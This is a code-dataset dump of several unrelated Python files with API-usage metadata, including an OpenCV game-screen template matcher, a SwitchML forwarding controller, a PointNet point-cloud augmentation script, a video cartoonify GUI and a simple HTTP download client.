"usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1433, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.IntegrityError", "line_number": 1434, "usage_type": "argument"}, {"api_name": "eNMS.environment.env.log", "line_number": 1440, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1440, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 1440, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1444, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1444, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.path", "line_number": 1448, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1448, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1449, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1449, "usage_type": "name"}, {"api_name": "os.scandir", "line_number": 1450, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1451, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1451, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 1452, "usage_type": "call"}, {"api_name": "json.load", "line_number": 1457, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 1460, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1460, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.str_to_date", "line_number": 1466, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 1466, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 1468, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1473, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1473, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1473, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1474, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1474, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 1477, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1477, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1480, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1480, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1480, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1483, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1483, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.rbac", "line_number": 1484, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1484, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1485, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1485, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 1487, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1487, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1488, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1488, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1489, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1489, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1490, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1490, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1496, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1496, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1500, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1500, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1509, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1509, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1511, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1511, "usage_type": "name"}, {"api_name": "eNMS.environment.env.get_ssh_port", "line_number": 1512, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1512, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 1512, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1513, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1513, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1514, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1514, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1519, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1519, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 1520, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 1523, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 1524, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1530, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1530, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 1531, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 1531, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 1538, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.path", "line_number": 1538, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1538, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1543, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1543, "usage_type": "name"}]} +{"seq_id": "72551880165", "text": "import numpy as np\nimport cv2\n\n\n# def colourClear(img):\n# img[np.where(np.sum(img, axis=2) < 120)] = [0, 0, 0]\n# img[np.where((np.max(img, axis=2) - np.min(img, axis=2) < 25) & (np.sum(img, axis=2) < 300))] = [0, 0, 0]\n# return img\n\n\ndef colourCheck(colour, blue=False, green=False, red=False):\n b = colour[:, 0]\n g = colour[:, 1]\n r = colour[:, 2]\n right_bool = False\n if blue:\n right_bool = (((b > r) * (b > g) * (b > 150)) > 0).any()\n if green:\n right_bool = (((g > b) * (g > r) * (g > 100)) > 0).any()\n if red:\n right_bool = (((r > b) * (r > g) * (r > 150)) > 0).any()\n\n return right_bool\n\n\ndef findPositions(oriImg, targetImg, mask=None, threshold=0.8, test='', colour=[255, 0, 0], maxThreshold=1.1):\n h, w = targetImg.shape[:2] # rows->h, cols->w\n h2, w2 = oriImg.shape[:2] # rows->h, cols->w\n img_gray = cv2.cvtColor(oriImg.copy(), cv2.COLOR_BGR2GRAY)\n targetImg_gray = cv2.cvtColor(targetImg.copy(), cv2.COLOR_BGR2GRAY)\n res = cv2.matchTemplate(img_gray, targetImg_gray, cv2.TM_CCORR_NORMED)\n img = oriImg.copy()\n # img = oriImg\n positions = []\n\n max_val = 1\n while (max_val > threshold):\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n start_row = np.max([0, max_loc[1] - h // 2])\n end_row = np.min([h2, max_loc[1] + h // 2])\n start_col = np.max([0, max_loc[0] - w // 2])\n end_col = np.min([w2, max_loc[0] + w // 2])\n if max_val > threshold:\n # Prevent start_row, end_row, start_col, end_col be out of range of image\n positions.append(max_loc)\n if test != '':\n img = cv2.rectangle(img, (max_loc[0], max_loc[1]), (max_loc[0] + w + 1, max_loc[1] + h + 1),\n colour)\n else:\n break\n res[start_row: end_row, start_col: end_col] = 0\n if test != '':\n cv2.imwrite('result{}.png'.format(test), img)\n\n return np.array(positions)\n", "repo_name": "YHD97/FinalProject", "sub_path": "gymLoL/gym_LoL/envs/colourHelper.py", "file_name": "colourHelper.py", "file_ext": "py", "file_size_in_byte": 1989, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.cvtColor", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.matchTemplate", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.TM_CCORR_NORMED", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.minMaxLoc", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "31277648104", "text": "import logging\n\nfrom control import Control\n\n\nclass Forwarder(Control):\n\n def __init__(self, target, gc, bfrt_info, mgid):\n # Set up base class\n super(Forwarder, self).__init__(target, gc)\n\n self.log = logging.getLogger(__name__)\n\n self.tables = [bfrt_info.table_get('pipe.Ingress.forwarder.forward')]\n self.table = self.tables[0]\n\n # Annotations\n self.table.info.key_field_annotation_add('hdr.ethernet.dst_addr', 'mac')\n\n # Multicast group ID for flood\n self.mgid = mgid\n\n # Keep set of mac addresses so we can delete them all without deleting the flood rule\n self.mac_addresses = {}\n\n # Clear table and add defaults\n self._clear()\n self.add_default_entries()\n\n def _clear(self):\n ''' Remove all entries (except broadcast) '''\n\n self.table.entry_del(self.target, [\n self.table.make_key(\n [self.gc.KeyTuple('hdr.ethernet.dst_addr', mac_address)])\n for mac_address in self.mac_addresses\n ])\n self.mac_addresses.clear()\n\n def add_default_entries(self):\n ''' Add broadcast and default entries '''\n\n # Add broadcast entry\n self.table.entry_add(self.target, [\n self.table.make_key([\n self.gc.KeyTuple('hdr.ethernet.dst_addr', 'ff:ff:ff:ff:ff:ff')\n ])\n ], [\n self.table.make_data([self.gc.DataTuple('flood_mgid', self.mgid)],\n 'Ingress.forwarder.flood')\n ])\n\n # Add default entry\n self.table.default_entry_set(\n self.target,\n self.table.make_data([self.gc.DataTuple('flood_mgid', self.mgid)],\n 'Ingress.forwarder.flood'))\n\n def add_entry(self, dev_port, mac_address):\n ''' Add one entry.\n\n Keyword arguments:\n dev_port -- dev port number\n mac_address -- MAC address reachable through the port\n '''\n\n self.table.entry_add(self.target, [\n self.table.make_key(\n [self.gc.KeyTuple('hdr.ethernet.dst_addr', mac_address)])\n ], [\n self.table.make_data([self.gc.DataTuple('egress_port', dev_port)],\n 'Ingress.forwarder.set_egress_port')\n ])\n self.mac_addresses[mac_address] = dev_port\n\n def add_entries(self, entry_list):\n ''' Add entries.\n\n Keyword arguments:\n entry_list -- a list of tuples: (dev_port, mac_address)\n '''\n\n for (dev_port, mac_address) in entry_list:\n self.add_entry(dev_port, mac_address)\n\n def remove_entry(self, mac_address):\n ''' Remove one entry '''\n self.table.entry_del(self.target, [\n self.table.make_key(\n [self.gc.KeyTuple('hdr.ethernet.dst_addr', mac_address)])\n ])\n del self.mac_addresses[mac_address]\n\n def get_dev_port(self, mac):\n ''' Get dev port for MAC address.\n\n Returns:\n (success flag, dev port or error message)\n '''\n\n mac = mac.upper()\n if mac not in self.mac_addresses:\n return (False, 'MAC address not found')\n return (True, self.mac_addresses[mac])\n\n def get_macs_on_port(self, dev_port):\n ''' Get MAC addresses associated to a dev port '''\n\n results = []\n for mac_address, port in self.mac_addresses.items():\n if port == dev_port:\n results.append(mac_address)\n\n return results\n\n def get_entries(self):\n ''' Get all forwarding entries.\n\n Returns:\n list of (MAC address, dev port)\n '''\n\n return self.mac_addresses.items()\n", "repo_name": "p4lang/p4app-switchML", "sub_path": "dev_root/controller/forwarder.py", "file_name": "forwarder.py", "file_ext": "py", "file_size_in_byte": 3760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 137, "dataset": "github-code", "pt": "52", "api": [{"api_name": "control.Control", "line_number": 6, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "36150693311", "text": "#-*-coding:utf-8-*-\n#数据量少的part加扰动增强\nimport h5py\nimport numpy as np\nimport os \nimport sys\nBASE_DIR=os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_DIR)\nsys.path.append(os.path.dirname(BASE_DIR))\nimport provider\n\nhdf5_data_dir=os.path.join(BASE_DIR,'./hdf5_data')\ntrain_file_list=provider.getDataFiles(os.path.join(hdf5_data_dir,'train_hdf5_file_list.txt'))\nnum_train_file=len(train_file_list)\n#渲染文件\ndef output_point_cloud(data,out_file):\n with open(out_file,'w') as f:\n for i in range(data.shape[0]):\n f.write('v %f %f %f\\r\\n'%(data[i][0],data[i][1],data[i][2]))\ndef find_all_needto_aug_part():\n '''\n 提取出源文件中符合条件的数据\n '''\n #初始化一个跟数据格式一样的数据原本\n object_data=np.zeros((1,2048,3))\n object_labels=np.zeros((1),np.int32)\n object_seg=np.zeros((1,2048),np.int32)\n #提取出所有符合标签的数据\n sigma=0.001\n clip=0.005\n for i in range(num_train_file):\n print('load the num '+str(i)+' train file')\n cur_train_filename = os.path.join(hdf5_data_dir, train_file_list[i])\n cur_data, cur_labels, cur_seg = provider.loadDataFile_with_seg(cur_train_filename)\n for nlabel in range(cur_data.shape[0]):\n jittered_data = np.clip(sigma * np.random.randn(cur_data.shape[0],cur_data.shape[1],cur_data.shape[2]),-clip,clip)\n for npoint in range(cur_data.shape[1]):\n #寻找满足条件的点云\n if cur_seg[nlabel][npoint]!=4 or cur_seg[nlabel][npoint]!=8 or cur_seg[nlabel][npoint]!=27 or cur_seg[nlabel][npoint]!=30 or \\\n cur_seg[nlabel][npoint]!=31 or cur_seg[nlabel][npoint]!=34 or cur_seg[nlabel][npoint]!=40 or cur_seg[nlabel][npoint]!=42 or \\\n cur_seg[nlabel][npoint]!=46 or cur_seg[nlabel][npoint]!=49:\n jittered_data[nlabel][npoint][:]=0\n cur_data=cur_data+jittered_data\n object_data=np.vstack((object_data,cur_data))\n object_labels=np.vstack((object_labels,cur_labels))\n object_seg=np.vstack((object_seg,cur_seg))\t\n print('train_file '+str(i)+' success')\n #上述object_data、object_lables、object_seg即包含了所有符合条件的数据\n num=object_data.shape[0]\n idx=np.random.randint(1,num,size=1)#随机将第一个初始化的数据赋成数据中的一个\n object_data[0,:,:]=object_data[idx,:,:]#数据第一个0项初始化为任意一项\n object_labels[0]=object_labels[idx]\n object_seg[0,:]=object_seg[idx,:]\n return object_data,object_labels,object_seg\n \ndef object_aug(object_data,object_labels,object_seg):\n #合并所有数据\n #渲染一个数据观察\n render_file=os.path.join(BASE_DIR,'render_aug_part.obj')\n output_point_cloud(object_data[3,:,:],render_file)\n \n for i in range(num_train_file):\n cur_train_filename = os.path.join(hdf5_data_dir, train_file_list[i])\n cur_data, cur_labels, cur_seg = provider.loadDataFile_with_seg(cur_train_filename)\n object_data=np.vstack((object_data,cur_data))\n object_labels=np.vstack((object_labels,cur_labels))\n object_seg=np.vstack((object_seg,cur_seg))\t\n object_data,object_labels,object_seg=provider.shuffle_data_with_seg(object_data,object_labels,object_seg)\n #将数据分成几个文件\n n_object=object_data.shape[0]\n num_every_file=n_object//8\n for i in range(8):\n f=h5py.File(hdf5_data_dir+'/object_part_aug'+str(i)+'.h5','w')\n f['data']=object_data[i*(num_every_file):(i+1)*num_every_file,:,:]\n f['label']=object_labels[i*(num_every_file):(i+1)*num_every_file]\n f['pid']=object_seg[i*(num_every_file):(i+1)*num_every_file,:]\n f.close()\n\nif __name__=='__main__':\n data,labels,seg=find_all_needto_aug_part()\n #f=h5py.File(hdf5_data_dir+'/object_part_aug.h5','w')\n #f['data']=data\n #f['label']=labels\n #f['pid']=seg\n # f.close()\n object_aug(data,labels,seg)\n", "repo_name": "legendhua/PointNet_codes", "sub_path": "part_segmentation/data_part_aug.py", "file_name": "data_part_aug.py", "file_ext": "py", "file_size_in_byte": 4007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "provider.getDataFiles", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "provider.loadDataFile_with_seg", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "provider.loadDataFile_with_seg", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 67, "usage_type": "call"}, {"api_name": "provider.shuffle_data_with_seg", "line_number": 68, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "14771401917", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 15 10:47:41 2021\r\n\r\n@author: postulate-31\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 7 11:15:15 2021\r\n\r\n@author: AMKnp.array([[0, 0],\r\n [0, mm]])\r\n\r\n\"\"\"\r\n\r\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\r\n\r\nimport cv2 #for image processing\r\nimport easygui #to open the filebox\r\nimport numpy as np #to store image\r\nimport imageio #to read image stored at particular path\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom tkinter import Label,Button,TOP\r\nfrom PIL import ImageTk, Image\r\nfrom tkinter import messagebox\r\n\r\n\r\n\r\ndef upload():\r\n ImagePath=easygui.fileopenbox()\r\n cartoonify(ImagePath)\r\n#upload()\r\ndef cartoonify(ImagePath):\r\n \r\n messagebox.showinfo(\"showinfo\", \"Start Converting....\")\r\n vidObj = cv2.VideoCapture(ImagePath)\r\n video_count = 0\r\n \r\n out = cv2.VideoWriter('outputvideo/carton_video.avi',cv2.VideoWriter_fourcc('M','J','P','G'), 10, (500,500))\r\n \r\n # checks whether frames were extracted\r\n success = 1\r\n \r\n while video_count<100:\r\n #while video_count<30:\r\n success, image = vidObj.read()\r\n sha=image.shape\r\n image=cv2.resize(image,(500,500))\r\n img_main=image\r\n \r\n cv2.imwrite(f\"original/frame{video_count}.jpg\",image)\r\n \r\n #MEAN SHIFT\r\n \r\n mimg=cv2.medianBlur(image,5)\r\n originImg=mimg\r\n # Shape of original image \r\n originShape = originImg.shape\r\n \r\n \r\n flatImg=np.reshape(originImg, [-1, 3])\r\n \r\n bandwidth = estimate_bandwidth(flatImg, quantile=0.1, n_samples=100) \r\n ms = MeanShift(bandwidth = bandwidth, bin_seeding=True)\r\n \r\n # Performing meanshift on flatImg \r\n ms.fit(flatImg)\r\n \r\n # (r,g,b) vectors corresponding to the different clusters after meanshift \r\n labels=ms.labels_\r\n \r\n # Remaining colors after meanshift \r\n cluster_centers = ms.cluster_centers_ \r\n \r\n # Finding and diplaying the number of clusters \r\n labels_unique = np.unique(labels) \r\n n_clusters_ = len(labels_unique) \r\n #print(\"number of estimated clusters : %d\" % n_clusters_) \r\n \r\n segmentedImg2 = cluster_centers[np.reshape(labels, originShape[:2])]\r\n \r\n cv2.imwrite('meanshift.jpg',segmentedImg2)\r\n \r\n '''' main '''\r\n originalmage = img_main\r\n originalmage = cv2.cvtColor(originalmage, cv2.COLOR_BGR2RGB)\r\n \r\n if originalmage is None:\r\n print(\"Can not find any image. Choose appropriate file\")\r\n sys.exit()\r\n # ReSized1 = cv2.resize(originalmage, (960, 540))\r\n #plt.imshow(ReSized1, cmap='gray')\r\n grayScaleImage = cv2.cvtColor(originalmage, cv2.COLOR_BGR2GRAY)\r\n #ReSized2 = cv2.resize(grayScaleImage, (960, 540))\r\n imr=originalmage\r\n imr=cv2.cvtColor(imr, cv2.COLOR_BGR2RGB)\r\n gaussian=cv2.GaussianBlur(imr,(7,7),0 )\r\n gaussian=cv2.cvtColor(gaussian, cv2.COLOR_BGR2RGB)\r\n #ReSized3 = cv2.resize(gaussian, (960, 540))\r\n \r\n #Meanshift here\r\n means=cv2.imread('meanshift.jpg')\r\n means = cv2.cvtColor(means, cv2.COLOR_BGR2RGB)\r\n \r\n Meanshift=means\r\n grayScaleImage = cv2.cvtColor(Meanshift, cv2.COLOR_BGR2GRAY)\r\n \r\n getEdge = cv2.adaptiveThreshold(grayScaleImage, 70, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 11)\r\n \r\n #ReSized4 = cv2.resize(getEdge, (960, 540))\r\n \r\n \r\n global cartoonImage\r\n cartoonImage = cv2.bitwise_and(Meanshift, Meanshift, mask=getEdge)\r\n #ReSized6 = cv2.resize(cartoonImage, (960, 540))\r\n #plt.imshow(ReSized6, cmap='gray')\r\n # Plotting the whole transition\r\n # images=[ReSized1, ReSized2, ReSized4, ReSized3,Meanshift, ReSized6]\r\n # tle=[\"Real Image\",\"GrayScale Image\",\"ThreshHold Image\",\"GaussianBlur\",'MeanShift Cluster',\"Cartoonyfy Image\"]\r\n \r\n # fig, axes = plt.subplots(3,2, figsize=(8,8), subplot_kw={'xticks':[], 'yticks':[]}, gridspec_kw=dict(hspace=0.1, wspace=0.1))\r\n # for i, ax in enumerate(axes.flat):\r\n # ax.set_title(tle[i])\r\n # ax.imshow(images[i], cmap='gray')\r\n \r\n # plt.show()\r\n #cv2.imwrite('cartoonified_Image.jpg',cv2.cvtColor(cartoonImage, cv2.COLOR_BGR2RGB))\r\n \r\n \r\n #cv2.imwrite(f\"cv/frame{video_count}.jpg\", segmentedImg2)\r\n # rim=cv2.resize(src, sha)\r\n ct=cv2.cvtColor(cartoonImage, cv2.COLOR_BGR2RGB)\r\n out.write(ct)\r\n cv2.imwrite(f\"cv/frame{video_count}.jpg\",ct)\r\n \r\n video_count+=1\r\n \r\n vidObj.release()\r\n out.release()\r\n messagebox.showinfo(\"showinfo\", \"Finish Converting....\")\r\n\r\n# \r\n#def save(cartoonImage, ImagePath):\r\n# #saving an image using imwrite()\r\n# newName=\"cartoonified_Image\"\r\n# path1 = os.path.dirname(ImagePath)\r\n# extension=os.path.splitext(ImagePath)[1]\r\n# path = os.path.join(path1, newName+extension)\r\n# cv2.imwrite(path, cv2.cvtColor(cartoonImage, cv2.COLOR_BGR2RGB))\r\n# I = \"Image saved by name \" + newName +\" at \"+ path\r\n# tk.messagebox.showinfo(title=None, message=I)\r\n## cv2.imwrite('cartoonified_Image.jpg',)\r\n#\r\n# \r\n \r\ntop=tk.Tk()\r\ntop.geometry('400x400')\r\ntop.title('Cartoonify Your Video !')\r\ntop.configure(background='white')\r\nlabel=Label(top,background='#CDCDCD', font=('calibri',20,'bold'))\r\nupload=Button(top,text=\"Cartoonify an video\",command=upload,padx=10,pady=5)\r\nupload.configure(background='#364156', foreground='white',font=('calibri',10,'bold'))\r\nupload.pack(side=TOP,pady=50)\r\n#save1=Button(top,text=\"Save cartoon image\",command=lambda: save(cartoonImage,ImagePath),padx=30,pady=5)\r\n#save1.configure(background='#364156', foreground='white',font=('calibri',10,'bold'))\r\n#save1.pack(side=TOP,pady=50)\r\ntop.mainloop()", "repo_name": "Muthukumar1303/DS-Projects", "sub_path": "cartoonify image and video/video_main.py", "file_name": "video_main.py", "file_ext": "py", "file_size_in_byte": 6024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "easygui.fileopenbox", "line_number": 35, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 40, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 40, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.cluster.estimate_bandwidth", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.cluster.MeanShift", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 98, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 101, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 103, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 107, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 108, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 111, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.adaptiveThreshold", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.ADAPTIVE_THRESH_MEAN_C", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_and", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 137, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 139, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 145, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 145, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 161, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 165, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 166, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 168, "usage_type": "name"}]} +{"seq_id": "10112669020", "text": "import sys\nimport http.client\nimport urllib, parser\n\n# Usage: python3 client.py \nserver = sys.argv[1]\nport = int(sys.argv[2]) # Only accept integers\nfilename = sys.argv[3]\n\nconnection = http.client.HTTPConnection(server, port)\nconnection.request(\"GET\", '/' + filename)\nresponse = connection.getresponse()\n\nprint (response.status, response.reason)\nprint (response.headers)\n\nf = open('./client-' + filename, \"w+\")\nprint(str(response.read(), encoding = \"utf-8\"), file = f)\n\nconnection.close()", "repo_name": "Minaduki-Shigure/computer_networking", "sub_path": "socket/1_WebServer/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 515, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", 